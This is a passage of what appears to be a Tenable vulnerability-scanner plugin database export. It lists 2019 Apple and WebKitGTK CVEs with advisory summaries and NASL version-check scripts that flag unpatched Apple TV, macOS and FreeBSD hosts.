(CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution. (CVE-2019-8600)\n\n - A malicious application may be able to read restricted memory. (CVE-2019-8598)\n\n - A malicious application may be able to elevate privileges. (CVE-2019-8602)\n\n - An application may be able to execute arbitrary code with system privileges. (CVE-2019-8574)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory. (CVE-2019-8607)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - A device may be passively tracked by its WiFi MAC address. (CVE-2019-8620)", "cvss3": {}, "published": "2019-05-24T00:00:00", "type": "nessus", "title": "Apple TV 12.0.0 and < 12.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8560", "CVE-2019-8568", "CVE-2019-8571", "CVE-2019-8574", "CVE-2019-8576", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8585", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8591", "CVE-2019-8593", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8605", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8620", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628", "CVE-2019-8637"], "modified": "2019-05-24T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "700719.PRM", "href": "https://www.tenable.com/plugins/nnm/700719", "sourceData": "Binary data 700719.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-29T00:22:13", "description": "According to its banner, the version of Apple TV on the remote device is prior to 12.3. It is therefore affected by multiple vulnerabilities as described in the HT210120 security advisory:\n\n - Multiple unspecified command execution vulnerabilities exist that allow an attacker to execute arbitrary commands, sometimes with kernel privileges.(CVE-2019-8593, CVE-2019-8585, CVE-2019-8605, CVE-2019-8600, CVE-2019-8574) \n - Multiple elevation of privilege vulnerabilities exist due to improper memory handling. An application can exploit this to gain elevated privileges. (CVE-2019-6237 CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608) \n - An un disclosed elevation of privilege vulnerability exist due to improper memory handling. An application can exploit this to gain elevated privileges. (CVE-2019-8602)", "cvss3": {}, "published": "2019-05-15T00:00:00", "type": "nessus", "title": "Apple TV < 12.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8560", "CVE-2019-8568", "CVE-2019-8571", "CVE-2019-8574", "CVE-2019-8576", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8585", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8591", "CVE-2019-8593", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8605", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8620", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628", "CVE-2019-8637"], "modified": "2020-01-16T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_12_3.NASL", "href": "https://www.tenable.com/plugins/nessus/125148", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125148);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/01/16\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-8560\",\n \"CVE-2019-8568\",\n \"CVE-2019-8571\",\n \"CVE-2019-8574\",\n \"CVE-2019-8576\",\n \"CVE-2019-8577\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8585\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8591\",\n \"CVE-2019-8593\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8598\",\n \"CVE-2019-8600\",\n \"CVE-2019-8601\",\n \"CVE-2019-8602\",\n \"CVE-2019-8605\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8620\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8628\",\n \"CVE-2019-8637\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT210120\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-05-09\");\n\n script_name(english:\"Apple TV < 12.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 12.3. It is therefore affected by multiple vulnerabilities\nas described in the HT210120 security advisory:\n\n - Multiple unspecified command execution vulnerabilities exist that\n allow an attacker to execute arbitrary commands, sometimes with\n kernel privileges.(CVE-2019-8593, CVE-2019-8585, CVE-2019-8605,\n CVE-2019-8600, CVE-2019-8574)\n \n - Multiple elevation of privilege vulnerabilities exist due to\n improper memory handling. An application can exploit this to gain\n elevated privileges. (CVE-2019-6237\n CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586,\n CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,\n CVE-2019-8597, CVE-2019-8601, CVE-2019-8608)\n \n - An un disclosed elevation of privilege vulnerability exist due to\n improper memory handling. An application can exploit this to gain\n elevated privileges. (CVE-2019-8602)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT210120\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 12.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8637\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = '16M153';\ntvos_ver = '12.3';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T14:26:44", "description": "The WebKitGTK project reports many vulnerabilities, including several arbitrary code execution vulnerabilities.", "cvss3": {}, "published": "2019-07-08T00:00:00", "type": "nessus", "title": "FreeBSD : webkit2-gtk3 -- Multiple vulnerabilities (3dd46e05-9fb0-11e9-bf65-00012e582166)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6201", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623"], "modified": "2022-05-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:webkit2-gtk3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3DD46E059FB011E9BF6500012E582166.NASL", "href": "https://www.tenable.com/plugins/nessus/126519", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126519);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6201\", \"CVE-2019-6237\", \"CVE-2019-6251\", \"CVE-2019-7285\", \"CVE-2019-7292\", \"CVE-2019-8503\", \"CVE-2019-8506\", \"CVE-2019-8515\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\", \"CVE-2019-8571\", \"CVE-2019-8583\", \"CVE-2019-8584\", \"CVE-2019-8586\", \"CVE-2019-8587\", \"CVE-2019-8594\", \"CVE-2019-8595\", \"CVE-2019-8596\", \"CVE-2019-8597\", \"CVE-2019-8601\", \"CVE-2019-8607\", \"CVE-2019-8608\", \"CVE-2019-8609\", \"CVE-2019-8610\", \"CVE-2019-8611\", \"CVE-2019-8615\", \"CVE-2019-8619\", \"CVE-2019-8622\", \"CVE-2019-8623\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"FreeBSD : webkit2-gtk3 -- Multiple vulnerabilities (3dd46e05-9fb0-11e9-bf65-00012e582166)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The WebKitGTK project reports many vulnerabilities, including several\narbitrary code execution vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0003.html\"\n );\n # https://vuxml.freebsd.org/freebsd/3dd46e05-9fb0-11e9-bf65-00012e582166.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bbb210b0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8544\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3<2.24.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:24:26", "description": "The remote host is running a version of macOS / Mac OS X that is 10.x prior to 10.14.5. It is, therefore, affected by the following vulnerabilities :\n\n - A validation issue was addressed with improved input sanitization.(CVE-2019-8603,CVE-2019-8560)\n\n - A memory corruption issue was addressed with improved memory handling.(CVE-2019-8635,CVE-2019-8616,CVE-2018-4456,CVE-2019-8604,CVE-2019-8574,CVE-2019-8569)\n\n - A logic issue was addressed with improved restrictions.(CVE-2019-8590)\n\n - A memory corruption issue was addressed with improved error handling.(CVE-2019-8592)\n\n - An out-of-bounds read was addressed with improved input validation.(CVE-2019-8585,CVE-2019-8607)\n\n - This issue was addressed with improved checks.(CVE-2019-8589)\n\n - An out-of-bounds read was addressed with improved bounds checking.(CVE-2019-8560,CVE-2019-8576)\n\n - An authentication issue was addressed with improved state management.(CVE-2019-8634)\n\n - A memory initialization issue was addressed with improved memory handling.(CVE-2019-8629)\n\n - A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.(CVE-2019-8606,CVE-2019-8568)\n\n - A use after free issue was addressed with improved memory management.(CVE-2019-8605)\n\n - A type confusion issue was addressed with improved memory handling.(CVE-2019-8591)\n\n - An input validation issue was addressed with improved memory handling.(CVE-2019-8577)\n\n - A memory corruption issue was addressed with improved input validation.(CVE-2019-8600)\n\n - An input validation issue was addressed with improved input validation.(CVE-2019-8598)\n\n - A memory corruption issue was addressed by removing the vulnerable code.(CVE-2019-8602)\n\n - Multiple memory corruption issues were addressed with improved memory handling.(CVE-2019-6237,CVE-2019-8571,CVE-2019-8583,CVE-2019-8584,CVE-2019-8586,CVE-2019-8587,CVE-2019-8594,CVE-2019-8595,CVE-2019-8596,CVE-2019-8597,CVE-2019-8601,CVE-2019-8608,CVE-2019-8609,CVE-2019-8610,CVE-2019-8611,CVE-2019-8615,CVE-2019-8619,CVE-2019-8622,CVE-2019-8623,CVE-2019-8628)", "cvss3": {}, "published": "2019-05-16T00:00:00", "type": "nessus", "title": "macOS 10.x < 10.14.5 Multiple Vulnerabilities (APPLE-SA-2019-05-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4456", "CVE-2019-6237", "CVE-2019-8560", "CVE-2019-8568", "CVE-2019-8569", "CVE-2019-8571", "CVE-2019-8574", "CVE-2019-8576", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8585", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8589", "CVE-2019-8590", "CVE-2019-8591", "CVE-2019-8592", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8603", "CVE-2019-8604", "CVE-2019-8605", "CVE-2019-8606", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8616", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628", "CVE-2019-8629", "CVE-2019-8634", "CVE-2019-8635"], "modified": "2019-05-16T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "700667.PRM", "href": "https://www.tenable.com/plugins/nnm/700667", "sourceData": "Binary data 700667.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-19T13:50:38", "description": "The version of Apple iOS running on the mobile device is prior to 12.3. It is, therefore, affected by multiple vulnerabilities as described in the HT210118 security Advisory.\n\n - Multiple elevation of privilege vulnerabilities exist due to improper memory handling. An application can exploit this to gain elevated privileges. (CVE-2019-8593, CVE-2019-8605, CVE-2019-8574)\n\n - Multiple unspecified command execution vulnerabilities exist that allow an attacker to execute arbitrary commands, sometimes with kernel privileges. (CVE-2019-8585, CVE-2019-8613,CVE-2019-8600, CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - An unspecified denial of service (DoS) vulnerability exists in the Kernel that allows an an attacker in a privileged position to perform a denial of service attack. (CVE-2019-8626)", "cvss3": {}, "published": "2019-05-15T00:00:00", "type": "nessus", "title": "Apple iOS < 12.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8560", "CVE-2019-8568", "CVE-2019-8571", "CVE-2019-8573", "CVE-2019-8574", "CVE-2019-8576", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8585", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8591", "CVE-2019-8593", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8599", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8605", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8612", "CVE-2019-8613", "CVE-2019-8615", "CVE-2019-8617", "CVE-2019-8619", "CVE-2019-8620", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8626", "CVE-2019-8628", "CVE-2019-8630", "CVE-2019-8637", "CVE-2019-8664"], "modified": "2022-02-14T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_123_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/125090", "sourceData": "Binary data apple_ios_123_check.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-29T00:22:33", "description": "The remote host is running Mac OS X 10.12.6 or Mac OS X 10.13.6 and is missing a security update. It is, therefore, affected by multiple vulnerabilities :\n\n - An application may be able to read restricted memory (CVE-2019-8603, CVE-2019-8560)\n\n - An application may be able to execute arbitrary code with system privileges (CVE-2019-8635, CVE-2019-8616, CVE-2019-8629, CVE-2018-4456, CVE-2019-8604, CVE-2019-8574, CVE-2019-8569)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2019-8590)\n\n - Processing a maliciously crafted audio file may lead to arbitrary code execution (CVE-2019-8592)\n\n - Processing a maliciously crafted movie file may lead to arbitrary code execution (CVE-2019-8585)\n\n - A malicious application may bypass Gatekeeper checks (CVE-2019-8589)\n\n - A malicious application may be able to read restricted memory (CVE-2019-8560, CVE-2019-8598)\n\n - A user may be unexpectedly logged in to another users account (CVE-2019-8634)\n\n - A local user may be able to load unsigned kernel extensions (CVE-2019-8606)\n\n - A malicious application may be able to execute arbitrary code with system privileges (CVE-2019-8605)\n\n - A local user may be able to cause unexpected system termination or read kernel memory (CVE-2019-8576)\n\n - An application may be able to cause unexpected system termination or write kernel memory (CVE-2019-8591)\n\n - An application may be able to gain elevated privileges (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution (CVE-2019-8600)\n\n - A malicious application may be able to elevate privileges (CVE-2019-8602)\n\n - A local user may be able to modify protected parts of the file system (CVE-2019-8568)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601,CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory (CVE-2019-8607)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2019-05-15T00:00:00", "type": "nessus", "title": "macOS and Mac OS X Multiple Vulnerabilities (Security Update 2019-003)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4456", "CVE-2019-6237", "CVE-2019-8560", "CVE-2019-8568", "CVE-2019-8569", "CVE-2019-8571", "CVE-2019-8574", "CVE-2019-8576", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8585", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8589", "CVE-2019-8590", "CVE-2019-8591", "CVE-2019-8592", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8603", "CVE-2019-8604", "CVE-2019-8605", "CVE-2019-8606", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8616", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628", "CVE-2019-8629", "CVE-2019-8634", "CVE-2019-8635"], "modified": "2019-12-13T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOSX_SECUPD2019-003.NASL", "href": "https://www.tenable.com/plugins/nessus/125151", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125151);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/12/13\");\n\n script_cve_id(\n \"CVE-2018-4456\",\n \"CVE-2019-6237\",\n \"CVE-2019-8560\",\n \"CVE-2019-8568\",\n \"CVE-2019-8569\",\n \"CVE-2019-8571\",\n \"CVE-2019-8574\",\n \"CVE-2019-8576\",\n \"CVE-2019-8577\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8585\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8589\",\n \"CVE-2019-8590\",\n \"CVE-2019-8591\",\n \"CVE-2019-8592\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8598\",\n \"CVE-2019-8600\",\n \"CVE-2019-8601\",\n \"CVE-2019-8602\",\n \"CVE-2019-8603\",\n \"CVE-2019-8604\",\n \"CVE-2019-8605\",\n \"CVE-2019-8606\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8616\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8628\",\n \"CVE-2019-8629\",\n \"CVE-2019-8634\",\n \"CVE-2019-8635\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT210119\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-05-09\");\n\n script_name(english:\"macOS and Mac OS X Multiple Vulnerabilities (Security Update 2019-003)\");\n script_summary(english:\"Checks the presence of Security Update 2019-003.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS or Mac OS X security update that fixes multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Mac OS X 10.12.6 or Mac OS X 10.13.6 and is missing a security update. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An application may be able to read restricted memory (CVE-2019-8603, CVE-2019-8560)\n\n - An application may be able to execute arbitrary code with system privileges (CVE-2019-8635, CVE-2019-8616,\n CVE-2019-8629, CVE-2018-4456, CVE-2019-8604, CVE-2019-8574, CVE-2019-8569)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2019-8590)\n\n - Processing a maliciously crafted audio file may lead to arbitrary code execution (CVE-2019-8592)\n\n - Processing a maliciously crafted movie file may lead to arbitrary code execution (CVE-2019-8585)\n\n - A malicious application may bypass Gatekeeper checks (CVE-2019-8589)\n\n - A malicious application may be able to read restricted memory (CVE-2019-8560, CVE-2019-8598)\n\n - A user may be unexpectedly logged in to another users account (CVE-2019-8634)\n\n - A local user may be able to load unsigned kernel extensions (CVE-2019-8606)\n\n - A malicious application may be able to execute arbitrary code with system privileges (CVE-2019-8605)\n\n - A local user may be able to cause unexpected system termination or read kernel memory (CVE-2019-8576)\n\n - An application may be able to cause unexpected system termination or write kernel memory (CVE-2019-8591)\n\n - An application may be able to gain elevated privileges (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution 